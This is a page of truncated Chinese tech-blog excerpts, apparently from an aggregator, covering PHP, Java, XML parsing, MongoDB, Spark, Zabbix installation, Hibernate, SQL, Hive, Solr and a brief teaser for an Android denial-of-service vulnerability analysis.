PHP：6种方法获取文件的扩展名 1、字符串查找和截取的方法 1 $extension = substr ( strrchr ( $file , '.' ), 1); 2、字符串查找和截取的方法二 1 $extension = substr
面试111 文强chu 面试
1事务隔离级别有那些，事务特性是什么（问到一次） 2 spring aop 如何管理事务的，如何实现的。动态代理如何实现，jdk怎么实现动态代理的，ioc是怎么实现的，spring是单例还是多例，有那些初始化bean的方式，各有什么区别（经常问） 3 struts默认提供了那些拦截器（一次） 4 过滤器和拦截器的区别（频率也挺高） 5 final，finally final
XML的四种解析方式小桔子 dom jdom dom4j sax
在平时工作中，难免会遇到把 XML 作为数据存储格式。面对目前种类繁多的解决方案，哪个最适合我们呢？在这篇文章中，我对这四种主流方案做一个不完全评测，仅仅针对遍历 XML 这块来测试，因为遍历 XML 是工作中使用最多的（至少我认为）。　　预备　　测试环境：　　AMD 毒龙1.4G OC 1.5G、256M DDR333、Windows2000 Server
wordpress中常见的操作 aichenglong 中文注册 wordpress 移除菜单
1 wordpress中使用中文名注册解决办法 1)使用插件 2)修改wp源代码进入到wp-include/formatting.php文件中找到 function sanitize_user( $username, $strict = false
小飞飞学管理-1 alafqq 管理
项目管理的下午题，其实就在提出问题（挑刺），分析问题，解决问题。今天我随意看下10年上半年的第一题。主要就是项目经理的提拨和培养。结合我自己经历写下心得对于公司选拔和培养项目经理的制度有什么毛病呢？ 1，公司考察，选拔项目经理，只关注技术能力，而很少或没有关注管理方面的经验，能力。 2，公司对项目经理缺乏必要的项目管理知识和技能方面的培训。 3，公司对项目经理的工作缺乏进行指
IO输入输出部分探讨百合不是茶 IO
//文件处理在处理文件输入输出时要引入java.IO这个包； /* 1，运用File类对文件目录和属性进行操作 2，理解流，理解输入输出流的概念 3，使用字节/符流对文件进行读/写操作 4，了解标准的I/O 5，了解对象序列化 */ //1，运用File类对文件目录和属性进行操作 //在工程中线创建一个text.txt
getElementById的用法 bijian1013 element
getElementById是通过Id来设置/返回HTML标签的属性及调用其事件与方法。用这个方法基本上可以控制页面所有标签，条件很简单，就是给每个标签分配一个ID号。返回具有指定ID属性值的第一个对象的一个引用。语法： &n
励志经典语录 bijian1013 励志人生
经典语录1: 哈佛有一个著名的理论：人的差别在于业余时间，而一个人的命运决定于晚上8点到10点之间。每晚抽出2个小时的时间用来阅读、进修、思考或参加有意的演讲、讨论，你会发现，你的人生正在发生改变，坚持数年之后，成功会向你招手。不要每天抱着QQ/MSN/游戏/电影/肥皂剧……奋斗到12点都舍不得休息，看就看一些励志的影视或者文章，不要当作消遣；学会思考人生，学会感悟人生
[MongoDB学习笔记三]MongoDB分片 bit1129 mongodb
MongoDB的副本集(Replica Set)一方面解决了数据的备份和数据的可靠性问题，另一方面也提升了数据的读写性能。MongoDB分片(Sharding)则解决了数据的扩容问题，MongoDB作为云计算时代的分布式数据库，大容量数据存储，高效并发的数据存取，自动容错等是MongoDB的关键指标。本篇介绍MongoDB的切片(Sharding) 1.何时需要分片 &nbs
【Spark八十三】BlockManager在Spark中的使用场景 bit1129 manager
1. Broadcast变量的存储，在HttpBroadcast类中可以知道 2. RDD通过CacheManager存储RDD中的数据，CacheManager也是通过BlockManager进行存储的 3. ShuffleMapTask得到的结果数据，是通过FileShuffleBlockManager进行管理的，而FileShuffleBlockManager最终也是使用BlockMan
yum方式部署zabbix ronin47 yum方式部署zabbix
安装网络yum库#rpm -ivh http://repo.zabbix.com/zabbix/2.4/rhel/6/x86_64/zabbix-release-2.4-1.el6.noarch.rpm 通过yum装mysql和zabbix调用的插件还有agent代理#yum install zabbix-server-mysql zabbix-web-mysql mysql-
Hibernate4和MySQL5.5自动创建表失败问题解决方法 byalias J2EE Hibernate4
今天初学Hibernate4，了解了使用Hibernate的过程。大体分为4个步骤： ①创建hibernate.cfg.xml文件 ②创建持久化对象 ③创建*.hbm.xml映射文件 ④编写hibernate相应代码在第四步中，进行了单元测试，测试预期结果是hibernate自动帮助在数据库中创建数据表，结果JUnit单元测试没有问题，在控制台打印了创建数据表的SQL语句，但在数据库中
Netty源码学习-FrameDecoder bylijinnan java netty
Netty 3.x的user guide里FrameDecoder的例子，有几个疑问： 1.文档说：FrameDecoder calls decode method with an internally maintained cumulative buffer whenever new data is received. 为什么每次有新数据到达时，都会调用decode方法？ 2.Dec
SQL行列转换方法 chicony 行列转换
create table tb(终端名称 varchar(10) , CEI分值 varchar(10) , 终端数量 int) insert into tb values('三星' , '0-5' , 74) insert into tb values('三星' , '10-15' , 83) insert into tb values('苹果' , '0-5' , 93)
中文编码测试 ctrain 编码
循环打印转换编码 String[] codes = { "iso-8859-1", "utf-8", "gbk", "unicode" }; for (int i = 0; i < codes.length; i++) { for (int j
hive 客户端查询报堆内存溢出解决方法 daizj hive 堆内存溢出
hive> select * from t_test where ds=20150323 limit 2; OK Exception in thread "main" java.lang.OutOfMemoryError: Java heap space 问题原因： hive堆内存默认为256M 这个问题的解决方法为：修改/us
人有多大懒，才有多大闲 (评论『卓有成效的程序员』) dcj3sjt126com 程序员
卓有成效的程序员给我的震撼很大，程序员作为特殊的群体，有的人可以这么懒，懒到事情都交给机器去做，而有的人又可以那么勤奋，每天都孜孜不倦得做着重复单调的工作。在看这本书之前，我属于勤奋的人，而看完这本书以后，我要努力变成懒惰的人。不要在去庞大的开始菜单里面一项一项搜索自己的应用程序，也不要在自己的桌面上放置眼花缭乱的快捷图标
Eclipse简单有用的配置 dcj3sjt126com eclipse
1、显示行号 Window -- Prefences -- General -- Editors -- Text Editors -- show line numbers 2、代码提示字符 Window ->Perferences，并依次展开 Java -> Editor -> Content Assist，最下面一栏 auto-Activation
在tomcat上面安装solr4.8.0全过程 eksliang Solr solr4.0后的版本安装 solr4.8.0安装
转载请出自出处： http://eksliang.iteye.com/blog/2096478 首先solr是一个基于java的web的应用，所以安装solr之前必须先安装JDK和tomcat，我这里就先省略安装tomcat和jdk了第一步：当然是下载去官网上下载最新的solr版本，下载地址
Android APP通用型拒绝服务、漏洞分析报告 gg163 漏洞 android APP 分析
点评：记得曾经有段时间很多SRC平台被刷了大量APP本地拒绝服务漏洞，移动安全团队爱内测（ineice.com）发现了一个安卓客户端的通用型拒绝服务漏洞，来看看他们的详细分析吧。 0xr0ot和Xbalien交流所有可能导致应用拒绝服务的异常类型时，发现了一处通用的本地拒绝服务漏洞。该通用型本地拒绝服务可以造成大面积的app拒绝服务。针对序列化对象而出现的拒绝服务主要
HoverTree项目已经实现分层 hvt 编程 .net Web C#ASP.ENT
HoverTree项目已经初步实现分层，源代码已经上传到 http://hovertree.codeplex.com请到SOURCE CODE查看。在本地用SQL Server 2008 数据库测试成功。数据库和表请参考：http://keleyi.com/a/bjae/ue6stb42.htmHoverTree是一个ASP.NET 开源项目，希望对你学习ASP.NET或者C#语言有帮助，如果你对
Google Maps API v3: Remove Markers 移除标记天梯梦 google maps api
Simply do the following: I. Declare a global variable: var markersArray = []; II. Define a function: function clearOverlays() { for (var i = 0; i < markersArray.length; i++ )
jQuery选择器总结 lq38366 jquery 选择器
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40
基础数据结构和算法六：Quick sort sunwinner Algorithm Quicksort
Quick sort is probably used more widely than any other. It is popular because it is not difficult to implement, works well for a variety of different kinds of input data, and is substantially faster t
如何让Flash不遮挡HTML div元素的技巧_HTML/Xhtml_网页制作刘星宇 html Web
今天在写一个flash广告代码的时候，因为flash自带的链接，容易被当成弹出广告，所以做了一个div层放到flash上面，这样链接都是a触发的不会被拦截，但发现flash一直处于div层上面，原来flash需要加个参数才可以。让flash置于DIV层之下的方法，让flash不挡住飘浮层或下拉菜单，让Flash不档住浮动对象或层的关键参数：wmode=opaque。方法如下：
Mybatis实用Mapper SQL汇总示例 wdmcygah sql mysql mybatis 实用
Mybatis作为一个非常好用的持久层框架，相关资料真的是少得可怜，所幸的是官方文档还算详细。本博文主要列举一些个人感觉比较常用的场景及相应的Mapper SQL写法，希望能够对大家有所帮助。不少持久层框架对动态SQL的支持不足，在SQL需要动态拼接时非常苦恼，而Mybatis很好地解决了这个问题，算是框架的一大亮点。对于常见的场景，例如：批量插入/更新/删除，模糊查询，多条件查询，联表查询，